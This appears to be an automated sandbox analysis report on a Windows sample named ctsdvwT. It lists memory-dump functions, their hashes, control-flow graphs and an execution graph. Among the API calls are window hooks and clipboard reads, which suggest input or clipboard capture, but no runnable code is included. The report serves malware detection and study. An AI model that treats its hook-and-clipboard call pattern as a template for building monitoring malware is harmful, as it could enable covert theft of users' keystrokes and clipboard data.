                                            • Opcode Fuzzy Hash: c1bf172eea89b8e641837bbbdac1184ed9e54f5007669f21b9c7c6f0f1c33e9c
                                            • Instruction Fuzzy Hash: 2B4127B0C00619CEDB24CFA9C984B8EBBF5BF45304F20816AD048AB255DB756986CF90
                                            Function 00FC44B4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 653 fc44b4-fc59d9 CreateActCtxA 656 fc59db-fc59e1 653->656 657 fc59e2-fc5a3c 653->657 656->657 664 fc5a3e-fc5a41 657->664 665 fc5a4b-fc5a4f 657->665 664->665 666 fc5a60 665->666 667 fc5a51-fc5a5d 665->667 668 fc5a61 666->668 667->666 668->668
                                            APIs
                                            • CreateActCtxA.KERNEL32(?), ref: 00FC59C9
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.1912551911.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_fc0000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: Create
                                            • String ID:
                                            • API String ID: 2289755597-0
                                            • Opcode ID: ce460b27709fd637c63e78d28b653dc231d69159c46bfd6ac44bdb3ddfd79dc1
                                            • Instruction ID: dd4232f528f83b519de342aa71fac3e3f2369ce12319524805967db8838661b1
                                            • Opcode Fuzzy Hash: ce460b27709fd637c63e78d28b653dc231d69159c46bfd6ac44bdb3ddfd79dc1
                                            • Instruction Fuzzy Hash: C04104B0C00719CBDB24CFAAC945B8EBBF5BF49704F208069D408AB255DB756986CF90
                                            Function 00FCD580 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 670 fcd580-fcd61c DuplicateHandle 671 fcd61e-fcd624 670->671 672 fcd625-fcd642 670->672 671->672
                                            APIs
                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00FCD60F
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.1912551911.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_fc0000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: DuplicateHandle
                                            • String ID:
                                            • API String ID: 3793708945-0
                                            • Opcode ID: d2af6de11a69ccc4b513db85420b6f8270ad0fd8e078f70d59e5b1334add2856
                                            • Instruction ID: f85c55dd61638964c2aeeacbbd41764fb8a988d6e12559558a165264938586a5
                                            • Opcode Fuzzy Hash: d2af6de11a69ccc4b513db85420b6f8270ad0fd8e078f70d59e5b1334add2856
                                            • Instruction Fuzzy Hash: 5421F2B5D002499FDB10CFAAD584AEEBFF4EB48320F14846AE858A3250D378A940DF65
                                            Function 00FCD588 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 675 fcd588-fcd61c DuplicateHandle 676 fcd61e-fcd624 675->676 677 fcd625-fcd642 675->677 676->677
                                            APIs
                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00FCD60F
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.1912551911.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_fc0000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: DuplicateHandle
                                            • String ID:
                                            • API String ID: 3793708945-0
                                            • Opcode ID: 4589e64891279dcce019d97a5658d73f421bcc727c737ea572b3f44bcd8d160a
                                            • Instruction ID: 5de87785a1de217ffd8801a996876e70be31632104165cbe8969ae4df53e3637
                                            • Opcode Fuzzy Hash: 4589e64891279dcce019d97a5658d73f421bcc727c737ea572b3f44bcd8d160a
                                            • Instruction Fuzzy Hash: 6021E4B59002499FDB10CF9AD984ADEFBF8EB48320F14841AE918A3350D374A940DFA5
                                            Function 00FCB298 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 680 fcb298-fcb2d8 681 fcb2da-fcb2dd 680->681 682 fcb2e0-fcb30b GetModuleHandleW 680->682 681->682 683 fcb30d-fcb313 682->683 684 fcb314-fcb328 682->684 683->684
                                            APIs
                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 00FCB2FE
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.1912551911.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_fc0000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: HandleModule
                                            • String ID:
                                            • API String ID: 4139908857-0
                                            • Opcode ID: 447b6b873aa53074d6ab811bf273db0cbd5e424f8490c26d39aa31ede1740d02
                                            • Instruction ID: b7752b9c313fb56163b2785d6970c55d5806b37412b42780bd779351236ccf5c
                                            • Opcode Fuzzy Hash: 447b6b873aa53074d6ab811bf273db0cbd5e424f8490c26d39aa31ede1740d02
                                            • Instruction Fuzzy Hash: 7511E0B5C007498FCB14CF9AD545BDEFBF8AF88324F10842AD459A7210C379A545CFA5
                                            Function 07091E18 Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 690 7091e18-7091e82 PostMessageW 691 7091e8b-7091e9f 690->691 692 7091e84-7091e8a 690->692 692->691
                                            APIs
                                            • PostMessageW.USER32(?,?,?,?), ref: 07091E75
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.1920924993.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_7090000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: MessagePost
                                            • String ID:
                                            • API String ID: 410705778-0
                                            • Opcode ID: d8792959dcbec85326d38b8be328f3c3994ddf90adfbe6a3fe6f98d048ef11ef
                                            • Instruction ID: 97652f4b04ffe982fe8c89ceacbee63167499c3e6acd0a804ad57de3c301e26d
                                            • Opcode Fuzzy Hash: d8792959dcbec85326d38b8be328f3c3994ddf90adfbe6a3fe6f98d048ef11ef
                                            • Instruction Fuzzy Hash: 181115B5800349DFDB10CF9AC444BDEFBF8EB48324F108419D558A7250C375A544CFA5
                                            Function 07091E12 Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 686 7091e12-7091e82 PostMessageW 687 7091e8b-7091e9f 686->687 688 7091e84-7091e8a 686->688 688->687
                                            APIs
                                            • PostMessageW.USER32(?,?,?,?), ref: 07091E75
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.1920924993.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_7090000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: MessagePost
                                            • String ID:
                                            • API String ID: 410705778-0
                                            • Opcode ID: 34458ec19cca24aa53b8b5da1114db2b35eb02cb9abeb0d23516fddf89afa04c
                                            • Instruction ID: 2bad3271ad0dd96928767533fad53a2e903cc9059c190af3a44512e14853b814
                                            • Opcode Fuzzy Hash: 34458ec19cca24aa53b8b5da1114db2b35eb02cb9abeb0d23516fddf89afa04c
                                            • Instruction Fuzzy Hash: 0011E0B58002499FDB10CF9AC585BDEBBF8EB48324F10841AE558A7250C375A584CFA5
                                            Function 070940F9 Relevance: 1.3, APIs: 1, Instructions: 49COMMON
                                            Download Yara Rule
                                            APIs
                                            • CloseHandle.KERNELBASE(?), ref: 07094158
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.1920924993.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_7090000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: CloseHandle
                                            • String ID:
                                            • API String ID: 2962429428-0
                                            • Opcode ID: d6f48612e5181e81302b04d1e6f8c17bee8ec3bba58e54fa87fbe5bb8b1f3574
                                            • Instruction ID: ee593740e7c236c008794df1ea09d3ab673752956a320c137c99e0512be0c35f
                                            • Opcode Fuzzy Hash: d6f48612e5181e81302b04d1e6f8c17bee8ec3bba58e54fa87fbe5bb8b1f3574
                                            • Instruction Fuzzy Hash: 4F1136B6800359CFCB10DF9AC545BDEBBF4EB48320F208429E568A7341D339A945CFA5
                                            Function 07094100 Relevance: 1.3, APIs: 1, Instructions: 47COMMON
                                            Download Yara Rule
                                            APIs
                                            • CloseHandle.KERNELBASE(?), ref: 07094158
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.1920924993.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_7090000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: CloseHandle
                                            • String ID:
                                            • API String ID: 2962429428-0
                                            • Opcode ID: 71a0b56d5c11171cad6b0137e9534fc8d8fc64114b43e6e0f79a1a48acb4eda9
                                            • Instruction ID: 8652b796692a7698533ab3b194e5e5f3cb49c1ad0ba44a719ba8d25906f0cae2
                                            • Opcode Fuzzy Hash: 71a0b56d5c11171cad6b0137e9534fc8d8fc64114b43e6e0f79a1a48acb4eda9
                                            • Instruction Fuzzy Hash: 3E1103B5800359CFCB20DF9AC545BDEBBF4EB48320F20852AE568A7350D739A545CFA5
                                            Function 00E5D4C4 Relevance: .1, Instructions: 75COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.1912170864.0000000000E5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E5D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_e5d000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4d180375ccdcc91a689173c47b3466af5cf688256cbc6caaa387fa280ff8187f
                                            • Instruction ID: fb6b613e4bc92499643022317cb91899c1f211766e6f267f8983eb9fe18bc630
                                            • Opcode Fuzzy Hash: 4d180375ccdcc91a689173c47b3466af5cf688256cbc6caaa387fa280ff8187f
                                            • Instruction Fuzzy Hash: D7212271508240DFCB25DF14DDC0B2ABF65FB98329F20C969EC095B256D336D85ACAA2
                                            Function 00E5D3D8 Relevance: .1, Instructions: 75COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.1912170864.0000000000E5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E5D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_e5d000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: cbc363115d4013f1757a777d87375deb12f4f1301e7b151477d3bd37e1536e8d
                                            • Instruction ID: 43e325022ab2ebbac15b7db03328d0da77368e01078743ba022eccf618b1e99f
                                            • Opcode Fuzzy Hash: cbc363115d4013f1757a777d87375deb12f4f1301e7b151477d3bd37e1536e8d
                                            • Instruction Fuzzy Hash: 51214871108204DFDB24DF04CDC0B26BF65FB94325F20C969DC095B256C336E85AC6A2
                                            Function 00E6D01C Relevance: .1, Instructions: 72COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.1912305195.0000000000E6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E6D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_e6d000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 96fd713a5eea0aac2f39a3eeb98cf246c092ea45e24da9823335fbe2c15f9bdd
                                            • Instruction ID: 431fb8ccebf31b2c07b3896e77e4fd811c0374a687b25b4dffa1e2f680e1e4e2
                                            • Opcode Fuzzy Hash: 96fd713a5eea0aac2f39a3eeb98cf246c092ea45e24da9823335fbe2c15f9bdd
                                            • Instruction Fuzzy Hash: 0C213771A88200DFCB54DF14E9C4B26BF66FB84318F60C56DD8095B296C337D847CA61
                                            Function 00E6D005 Relevance: .1, Instructions: 62COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.1912305195.0000000000E6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E6D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_e6d000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 3a3c4793dd24dc4361731ebafd5b28f64c2a249b87837170d8202ab916fe5719
                                            • Instruction ID: cfce3304ff4517aef70c5ba1848a1adb439aa4f0bd469f8f63a644f7e0cc145a
                                            • Opcode Fuzzy Hash: 3a3c4793dd24dc4361731ebafd5b28f64c2a249b87837170d8202ab916fe5719
                                            • Instruction Fuzzy Hash: F621537554D3808FD712CF24D994715BF72EB46318F28C5EAD8498F6A7C33A980ACB62
                                            Function 00E5D3D3 Relevance: .1, Instructions: 56COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.1912170864.0000000000E5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E5D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_e5d000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                            • Instruction ID: 63c6f2424861e7c9f8304842462c31bb85603cf4b2df3db7145ff4367eddb508
                                            • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                            • Instruction Fuzzy Hash: 43110372404240CFDB16CF00D9C4B16BF72FB94328F24C6A9DC090B256C33AE85ACBA1
                                            Function 00E5D4BF Relevance: .1, Instructions: 56COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.1912170864.0000000000E5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E5D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_e5d000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                            • Instruction ID: 8df7470540101eb16b47730e128ebb8c5522de945c79b3587e744e351e8d7b3d
                                            • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                            • Instruction Fuzzy Hash: 7211E676504280CFCB16CF14D9C4B16BF71FB94328F24C6A9DC494B656C336D85ACBA1
                                            Function 00E5D731 Relevance: .0, Instructions: 45COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.1912170864.0000000000E5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E5D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_e5d000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4df0d73b50de95f34153817a62ea2d44f50db4f04bee32e1d69af2f79d784157
                                            • Instruction ID: 8454bfcf82c15d3a8399d9257ea761a4ee3442d3b3f1af518a8f3ebdb473ac9b
                                            • Opcode Fuzzy Hash: 4df0d73b50de95f34153817a62ea2d44f50db4f04bee32e1d69af2f79d784157
                                            • Instruction Fuzzy Hash: 0901A77110D3449AE7204A25CD847A7FF98EF49326F18C96BED095A196C2799848C671
                                            Function 00E5D730 Relevance: .0, Instructions: 36COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.1912170864.0000000000E5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E5D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_e5d000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 34799ed5a807e10bea4f1b9884893e27110358cb9cc3f35fe571685db4ddd16d
                                            • Instruction ID: 28a2e61e2d0b1897201e46467e4d56204584fe0d1d0a267388c8517296dd0d59
                                            • Opcode Fuzzy Hash: 34799ed5a807e10bea4f1b9884893e27110358cb9cc3f35fe571685db4ddd16d
                                            • Instruction Fuzzy Hash: 6EF0C2710093449AE7208A16CD84B62FFA8EB94339F18C95AED085F282C379A844CA71

                                            Execution Graph

                                            Execution Coverage:10.2%
                                            Dynamic/Decrypted Code Coverage:100%
                                            Signature Coverage:0%
                                            Total number of Nodes:239
                                            Total number of Limit Nodes:26
                                            execution_graph 22835 6398998 22836 6398a00 CreateWindowExW 22835->22836 22838 6398abc 22836->22838 22838->22838 22839 639c6f8 DuplicateHandle 22840 639c78e 22839->22840 23001 1390848 23003 139084e 23001->23003 23002 139091b 23003->23002 23005 1391380 23003->23005 23007 1391396 23005->23007 23006 1391490 23006->23003 23007->23006 23012 639fbaf 23007->23012 23018 639fbc0 23007->23018 23024 63958f8 23007->23024 23030 63958f3 23007->23030 23013 639fbc8 23012->23013 23014 639fc0d 23013->23014 23036 639fc20 23013->23036 23040 639fca2 23013->23040 23044 639fc10 23013->23044 23014->23007 23019 639fbc8 23018->23019 23020 639fc0d 23019->23020 23021 639fc20 SetWindowsHookExA 23019->23021 23022 639fc10 SetWindowsHookExA 23019->23022 23023 639fca2 SetWindowsHookExA 23019->23023 23020->23007 23021->23019 23022->23019 23023->23019 23025 639590a 23024->23025 23028 63959bb 23025->23028 23052 639039c 23025->23052 23027 6395981 23058 63903bc 23027->23058 23028->23007 23031 63958f8 23030->23031 23032 639039c GetModuleHandleW 23031->23032 23034 63959bb 23031->23034 23033 6395981 23032->23033 23035 63903bc KiUserCallbackDispatcher 23033->23035 23034->23007 23035->23034 23038 639fc3d 23036->23038 23037 639fca0 23037->23013 23038->23037 23048 639ee20 23038->23048 23041 639fc5d 23040->23041 23042 639ee20 SetWindowsHookExA 23041->23042 23043 639fca0 23041->23043 23042->23041 23043->23013 23046 639fc20 23044->23046 23045 639fca0 23045->23013 23046->23045 23047 639ee20 SetWindowsHookExA 23046->23047 23047->23046 23049 639fe28 SetWindowsHookExA 23048->23049 23051 639feb2 23049->23051 23051->23038 23053 63903a7 23052->23053 23062 6396eb1 23053->23062 23072 6396de9 23053->23072 23083 6396ec0 23053->23083 23054 6395f6a 23054->23027 23059 63903c7 23058->23059 23061 639d8b3 23059->23061 23104 639c304 23059->23104 23061->23028 23063 6396eeb 23062->23063 23064 6395e44 GetModuleHandleW 23063->23064 23065 6396f52 23064->23065 23066 6396f6e 23065->23066 23071 6395e44 GetModuleHandleW 23065->23071 23093 6397440 23065->23093 23098 6397391 23065->23098 23067 6395e54 GetModuleHandleW 23066->23067 23068 6396f9a 23066->23068 23067->23068 23071->23066 23074 6396df3 23072->23074 23073 6396e63 23074->23073 23075 6395e44 GetModuleHandleW 23074->23075 23076 6396f52 23075->23076 23077 6396f6e 23076->23077 23080 6397391 GetModuleHandleW 23076->23080 23081 6397440 GetModuleHandleW 23076->23081 23082 6395e44 GetModuleHandleW 23076->23082 23078 6395e54 GetModuleHandleW 23077->23078 23079 6396f9a 23077->23079 23078->23079 23080->23077 23081->23077 23082->23077 23084 6396eeb 23083->23084 23085 6395e44 GetModuleHandleW 23084->23085 23086 6396f52 23085->23086 23087 6396f6e 23086->23087 23090 6397391 GetModuleHandleW 23086->23090 23091 6397440 GetModuleHandleW 23086->23091 23092 6395e44 GetModuleHandleW 23086->23092 23088 6395e54 GetModuleHandleW 23087->23088 23089 6396f9a 23087->23089 23088->23089 23090->23087 23091->23087 23092->23087 23094 639746d 23093->23094 23095 63974e9 23094->23095 23096 639760f GetModuleHandleW 23094->23096 23097 6397693 GetModuleHandleW 23094->23097 23095->23066 23096->23095 23097->23095 23099 63973ab 23098->23099 23100 63973af 23098->23100 23099->23066 23101 63974e9 23100->23101 23102 639760f GetModuleHandleW 23100->23102 23103 6397693 GetModuleHandleW 23100->23103 23101->23066 23102->23101 23103->23101 23105 639d8c8 KiUserCallbackDispatcher 23104->23105 23107 639d936 23105->23107 23107->23059 23108 63978eb 23109 6397938 GetModuleHandleW 23108->23109 23110 6397932 23108->23110 23111 6397965 23109->23111 23110->23109 23112 639e140 23113 639e14b 23112->23113 23114 639e15b 23113->23114 23116 639dbb0 23113->23116 23117 639e190 OleInitialize 23116->23117 23118 639e1f4 23117->23118 23118->23114 22841 133d01c 22842 133d034 22841->22842 22843 133d08e 22842->22843 22849 6396c34 22842->22849 22853 6396c44 22842->22853 22861 639d2d2 22842->22861 22869 6398b43 22842->22869 22875 6398b50 22842->22875 22850 6396c3f 22849->22850 22881 6396c6c 22850->22881 22852 6398c87 22852->22843 22854 6396c4f 22853->22854 22855 639d361 22854->22855 22857 639d351 22854->22857 22924 639c2ac 22855->22924 22912 639d478 22857->22912 22918 639d488 22857->22918 22858 639d35f 22862 639d2da 22861->22862 22863 639d361 22862->22863 22865 639d351 22862->22865 22864 639c2ac 2 API calls 22863->22864 22866 639d35f 22864->22866 22867 639d478 2 API calls 22865->22867 22868 639d488 2 API calls 22865->22868 22867->22866 22868->22866 22870 6398b76 22869->22870 22871 6396c34 GetModuleHandleW 22870->22871 22872 6398b82 22871->22872 22873 6396c44 2 API calls 22872->22873 22874 6398b97 22873->22874 22874->22843 22876 6398b76 22875->22876 22877 6396c34 GetModuleHandleW 22876->22877 22878 6398b82 22877->22878 22879 6396c44 2 API calls 22878->22879 22880 6398b97 22879->22880 22880->22843 22882 6396c77 22881->22882 22887 6395e44 22882->22887 22884 6398ce9 22886 6398d57 22884->22886 22892 6395e54 22884->22892 22889 6395e4f 22887->22889 22888 63973ab 22888->22884 22889->22888 22896 639760f 22889->22896 22904 6397693 22889->22904 22893 63978f0 GetModuleHandleW 22892->22893 22895 6397965 22893->22895 22895->22886 22897 639761a 22896->22897 22898 6395e54 GetModuleHandleW 22897->22898 22899 639773a 22898->22899 22900 6395e54 GetModuleHandleW 22899->22900 22903 63977b4 22899->22903 22901 6397788 22900->22901 22902 6395e54 GetModuleHandleW 22901->22902 22901->22903 22902->22903 22903->22888 22906 6397696 22904->22906 22905 6395e54 GetModuleHandleW 22907 6397788 22905->22907 22908 6395e54 GetModuleHandleW 22906->22908 22910 63977b4 22906->22910 22911 639773a 22906->22911 22909 6395e54 GetModuleHandleW 22907->22909 22907->22910 22908->22911 22909->22910 22910->22888 22911->22905 22911->22910 22914 639d488 22912->22914 22913 639c2ac 2 API calls 22913->22914 22914->22913 22915 639d56e 22914->22915 22931 639d958 22914->22931 22936 639d968 22914->22936 22915->22858 22920 639d496 22918->22920 22919 639c2ac 2 API calls 22919->22920 22920->22919 22921 639d56e 22920->22921 22922 639d968 OleGetClipboard 22920->22922 22923 639d958 OleGetClipboard 22920->22923 22921->22858 22922->22920 22923->22920 22925 639c2b7 22924->22925 22926 639d5ca 22925->22926 22927 639d674 22925->22927 22928 639d622 CallWindowProcW 22926->22928 22929 639d5d1 22926->22929 22930 6396c44 OleGetClipboard 22927->22930 22928->22929 22929->22858 22930->22929 22932 639d987 22931->22932 22933 639da20 22932->22933 22941 639dedf 22932->22941 22959 639df20 22932->22959 22933->22914 22937 639d987 22936->22937 22938 639da20 22937->22938 22939 639dedf OleGetClipboard 22937->22939 22940 639df20 OleGetClipboard 22937->22940 22938->22914 22939->22937 22940->22937 22942 639dee5 22941->22942 22945 639df3c 22941->22945 22943 639df61 22942->22943 22947 639def5 22942->22947 22944 639df95 22943->22944 22948 639dfd9 22943->22948 22956 639df68 OleGetClipboard 22944->22956 22957 639df58 OleGetClipboard 22944->22957 22958 639dedf OleGetClipboard 22944->22958 22945->22932 22946 639df9b 22946->22932 22947->22945 22955 639dedf OleGetClipboard 22947->22955 22965 639df68 22947->22965 22977 639df58 22947->22977 22949 639e059 22948->22949 22989 639e230 22948->22989 22993 639e220 22948->22993 22949->22932 22950 639e077 22950->22932 22955->22945 22956->22946 22957->22946 22958->22946 22960 639df28 22959->22960 22961 639df3c 22960->22961 22962 639df68 OleGetClipboard 22960->22962 22963 639df58 OleGetClipboard 22960->22963 22964 639dedf OleGetClipboard 22960->22964 22961->22932 22962->22961 22963->22961 22964->22961 22966 639df7a 22965->22966 22967 639df95 22966->22967 22969 639dfd9 22966->22969 22972 639df68 OleGetClipboard 22967->22972 22973 639df58 OleGetClipboard 22967->22973 22974 639dedf OleGetClipboard 22967->22974 22968 639df9b 22968->22945 22971 639e059 22969->22971 22975 639e230 OleGetClipboard 22969->22975 22976 639e220 OleGetClipboard 22969->22976 22970 639e077 22970->22945 22971->22945 22972->22968 22973->22968 22974->22968 22975->22970 22976->22970 22978 639df68 22977->22978 22979 639df95 22978->22979 22981 639dfd9 22978->22981 22986 639df68 OleGetClipboard 22979->22986 22987 639df58 OleGetClipboard 22979->22987 22988 639dedf OleGetClipboard 22979->22988 22980 639df9b 22980->22945 22983 639e059 22981->22983 22984 639e230 OleGetClipboard 22981->22984 22985 639e220 OleGetClipboard 22981->22985 22982 639e077 22982->22945 22983->22945 22984->22982 22985->22982 22986->22980 22987->22980 22988->22980 22991 639e245 22989->22991 22992 639e26b 22991->22992 22997 639dcc8 22991->22997 22992->22950 22995 639e230 22993->22995 22994 639dcc8 OleGetClipboard 22994->22995 22995->22994 22996 639e26b 22995->22996 22996->22950 22998 639e2d8 OleGetClipboard 22997->22998 23000 639e372 22998->23000

                                            Executed Functions

                                            Function 0139C980 Relevance: 3.5, Strings: 1, Instructions: 2244COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4138936539.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_1390000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: ,buq
                                            • API String ID: 0-4122549453
                                            • Opcode ID: 3e693ef4b52828504668803515a93a8bd986f70623f59f245a736fda154f4d11
                                            • Instruction ID: 072443d1d1bca95d070098d40d08be0d63341e10cfc64d5caf50683651412c8b
                                            • Opcode Fuzzy Hash: 3e693ef4b52828504668803515a93a8bd986f70623f59f245a736fda154f4d11
                                            • Instruction Fuzzy Hash: 5833FB31D1071A8EDB11EF68C88069DF7B1FF99300F15D69AD459AB221EB70AAC5CF81
                                            Function 01399638 Relevance: 2.8, Instructions: 2799COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4138936539.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_1390000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5c0d0206d821756332c4b8b815f1e8d068fb1380d8f6c095f22908c4ccc79985
                                            • Instruction ID: c263c5ed0a56e59b7bba396cb231dd88c8e5a1f626162dc1b9d11f2104f29da9
                                            • Opcode Fuzzy Hash: 5c0d0206d821756332c4b8b815f1e8d068fb1380d8f6c095f22908c4ccc79985
                                            • Instruction Fuzzy Hash: 9A53F631C10B1A8ACB51EF68C8905A9F7B1FF99300F15D79AE45977221FB70AAD4CB81
                                            Function 01393E90 Relevance: 1.5, Strings: 1, Instructions: 238COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4138936539.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_1390000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: \V|l
                                            • API String ID: 0-253765261
                                            • Opcode ID: 1078683f1919766829b85aea492888f7bcfaedb9849b543ab44484a0883bc748
                                            • Instruction ID: 088f07186c726f960136508be4ad1c2719dde8ca1e8d14d344eaf32feaa47190
                                            • Opcode Fuzzy Hash: 1078683f1919766829b85aea492888f7bcfaedb9849b543ab44484a0883bc748
                                            • Instruction Fuzzy Hash: 22914EB0E00209DFDF14CFA9D99579EBBF2BF88318F148129E455A7254EB749886CB81
                                            Function 01394AA8 Relevance: .3, Instructions: 266COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4138936539.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_1390000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 29a5d706efae16f7a433f7b0c0b51a9fdc868a33ba121c21c58f87718d5c769c
                                            • Instruction ID: 34dfea092e8e09d3081db182f5b450cb877f34a82be1a5dec60d358a2698f442
                                            • Opcode Fuzzy Hash: 29a5d706efae16f7a433f7b0c0b51a9fdc868a33ba121c21c58f87718d5c769c
